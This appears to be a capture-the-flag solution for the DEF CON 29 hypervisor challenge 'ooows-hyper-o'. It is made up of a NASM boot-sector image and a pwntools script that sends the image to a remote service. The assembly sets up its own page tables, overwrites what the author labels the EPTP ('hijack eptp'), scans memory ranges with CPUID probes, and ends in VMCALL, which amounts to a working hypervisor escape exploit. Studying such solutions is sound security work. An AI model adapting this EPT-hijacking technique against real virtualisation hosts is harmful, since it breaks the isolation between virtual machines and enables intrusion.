solution to ooows-hyper-o in DC29CTF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; nasm -fbin sc.asm -o sc
; some code from https://github.com/gamozolabs/chocolate_milk
;
; Flat 512-byte image: the code below is padded to 0x1fe bytes and closed with
; the 0x55 0xaa signature.  It starts in 16-bit real mode, copies itself to
; linear 0xf000, switches to 32-bit protected mode through the embedded GDT,
; writes a handful of page-table-style entries, scans a range of candidate
; entries with CPUID in between, and ends with VMCALL.
; NOTE(review): what the hypervisor makes of the writes at 0x0..0x3000 and at
; 0x200000 is not visible in this file; the original author's labels for them
; ("code", "stack", "pde", "hijack eptp") are kept verbatim below.
; Syntax: NASM, Intel operand order.  A20 enable (out 0x92) was commented out
; in the original and is omitted here.

[org 0xf000]
[bits 16]

; ---- constants (every value is taken from the original instruction stream) ----
COPY_LEN        equ 0x1000          ; bytes moved by the self-copy loop
LOAD_ADDR       equ 0xf000          ; org / destination of the self-copy
SEL_CODE32      equ 0x0018          ; GDT selector: 32-bit code, base 0
SEL_DATA32      equ 0x0020          ; GDT selector: 32-bit data, base 0
STACK_TOP       equ 0x8000
TABLE_BASE      equ 0x3d000000      ; constant folded into every table entry
TABLE_FLAGS     equ 0x477           ; low bits of the leaf entries
DIR_FLAGS       equ 7               ; low bits of the three chaining entries
LVL1            equ 0x0000          ; chaining tables: 0x0 -> 0x1000 -> 0x2000 -> 0x3000
LVL2            equ 0x1000
LVL3            equ 0x2000
LEAF_TABLE      equ 0x3000          ; table that receives the 8-byte entries
EPTP_SLOT       equ 0x200000        ; author's label: "hijack eptp"
EPTP_VALUE      equ 0x3d00005e
RESULT          equ 0x4000          ; six dwords read back after the scan
SCAN_START      equ 0x10000
SCAN_STEP       equ 0x10000
SCAN_END        equ 0x40000000
MARK            equ 0x303030        ; low 24 bits == ASCII "000"

entry:
        cli                             ; no interrupts while relocating / switching modes
        cld                             ; kept from the original; no string ops follow
        mov     ecx, COPY_LEN
        mov     edx, LOAD_ADDR
.copy:                                  ; byte copy from cs:edx to ds:edx, edx ascending
        mov     al, [cs:edx]
        mov     [ds:edx], al
        inc     edx
        loop    .copy                   ; 16-bit mode: LOOP counts down CX

        ; DS = 0 so [gdt] below is a flat linear address
        xor     ax, ax
        mov     ds, ax
        lgdt    [gdt]

        ; CR0.PE = 1 (bit 0)
        mov     eax, cr0
        or      eax, (1 << 0)
        mov     cr0, eax

        ; far jump reloads CS with the 32-bit code selector
        jmp     SEL_CODE32:pm_entry

[bits 32]
pm_entry:
        ; flat 32-bit data selector into every data segment register
        mov     ax, SEL_DATA32
        mov     es, ax
        mov     ds, ax
        mov     fs, ax
        mov     gs, ax
        mov     ss, ax
        mov     esp, STACK_TOP

        ; three chaining entries, each naming the next table with flags 7
        mov     dword [LVL1], TABLE_BASE + LVL2 + DIR_FLAGS
        mov     dword [LVL2], TABLE_BASE + LVL3 + DIR_FLAGS
        mov     dword [LVL3], TABLE_BASE + LEAF_TABLE + DIR_FLAGS

        ; leaf entries (slot index * 8) -- author's labels on the right
        mov     dword [LEAF_TABLE + 0xff*8], TABLE_BASE + 0xff000 + TABLE_FLAGS    ; code
        mov     dword [LEAF_TABLE + 0xf*8],  TABLE_BASE + LOAD_ADDR + TABLE_FLAGS  ; code
        mov     dword [LEAF_TABLE + 8*8],    TABLE_BASE + STACK_TOP + TABLE_FLAGS  ; stack
        mov     dword [LEAF_TABLE + 3*8],    TABLE_BASE + LEAF_TABLE + TABLE_FLAGS ; pde

        ; hijack eptp (author's label)
        mov     dword [EPTP_SLOT], EPTP_VALUE
        cpuid

        ; edi = candidate entry for slot 4: address | TABLE_FLAGS
        mov     edi, SCAN_START | TABLE_FLAGS
.scan:
        mov     dword [LEAF_TABLE + 4*8], edi
        cpuid
        mov     eax, [RESULT]
        and     eax, 0xffffff           ; compare only the low three bytes
        cmp     eax, MARK
        je      .found
        add     edi, SCAN_STEP
        cmp     edi, SCAN_END + TABLE_FLAGS
        jae     .fail                   ; unsigned compare: range exhausted
        jmp     .scan

.found:
        ; load the six dwords at RESULT into eax, ebx, ecx, edx, esi, edi
        mov     eax, [RESULT]
        mov     ebx, [RESULT + 4]
        mov     ecx, [RESULT + 4*2]
        mov     edx, [RESULT + 4*3]
        mov     esi, [RESULT + 4*4]
        mov     edi, [RESULT + 4*5]
        vmcall
.fail:
        hlt

        align   8
gdt_base:
        dq 0x0000000000000000 ; 0x0000 | Null descriptor
        dq 0x00009a007c00ffff ; 0x0008 | 16-bit, present, code, base 0x7c00
        dq 0x000092000000ffff ; 0x0010 | 16-bit, present, data, base 0
        dq 0x00cf9a000000ffff ; 0x0018 | 32-bit, present, code, base 0
        dq 0x00cf92000000ffff ; 0x0020 | 32-bit, present, data, base 0
        dq 0x00209a0000000000 ; 0x0028 | 64-bit, present, code, base 0
        dq 0x0000920000000000 ; 0x0030 | 64-bit, present, data, base 0
gdt:                                    ; GDTR image: 16-bit limit, 32-bit base
        dw (gdt - gdt_base) - 1
        dd gdt_base

        ; pad to 0x1fe bytes, then the boot signature
        times 0x1fe - ($ - $$) db 0
        db 0x55, 0xaa
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Delivery script for the assembled image produced from the accompanying
# sc.asm (see the `nasm -fbin` line in that file's header).
from pwn import *
import os
import sys
# pwntools log verbosity for the tube opened below.
context.log_level = 'info'
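def exploit(r):
    """Send the assembled image over tube ``r`` and hand the tube to the user.

    Args:
        r: a pwntools tube (``remote`` or ``process``) exposing
           ``recvuntil``, ``sendline`` and ``interactive``.

    Reads ``sc.o`` from the current directory, prefixes every byte with
    ``\\x16`` (the framing the original script used; presumably the receiving
    side strips it -- confirm against the challenge front end) and sends the
    result as a single line, then drops into ``r.interactive()``.

    NOTE(review): the build line in sc.asm writes ``sc`` while this reads
    ``sc.o``; make sure the assembled image is given the name used here.
    """
    # Wait for the banner fragment the original script keyed on.
    r.recvuntil(b'#mmm" #mmmmm')
    # Explicit file read instead of pwntools' ``read`` so the file is closed
    # deterministically and the helper has no non-stdlib dependency.
    with open('sc.o', 'rb') as f:
        payload = f.read()
    # bytearray() iteration yields ints on both Python 2 and 3; bytes(bytearray([x]))
    # re-wraps each int as a one-byte string so the join works on either version
    # (the original str-concatenation raised TypeError under Python 3).
    packet = b''.join(b'\x16' + bytes(bytearray([x])) for x in bytearray(payload))
    r.sendline(packet)
    r.interactive()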
if __name__ == '__main__':
    # Two positional arguments (host, port) select a network target;
    # a single one names a local binary to spawn.
    args = sys.argv[1:]
    if len(args) >= 2:
        r = remote(args[0], int(args[1]))
    else:
        r = process('./%s' % args[0])
    exploit(r)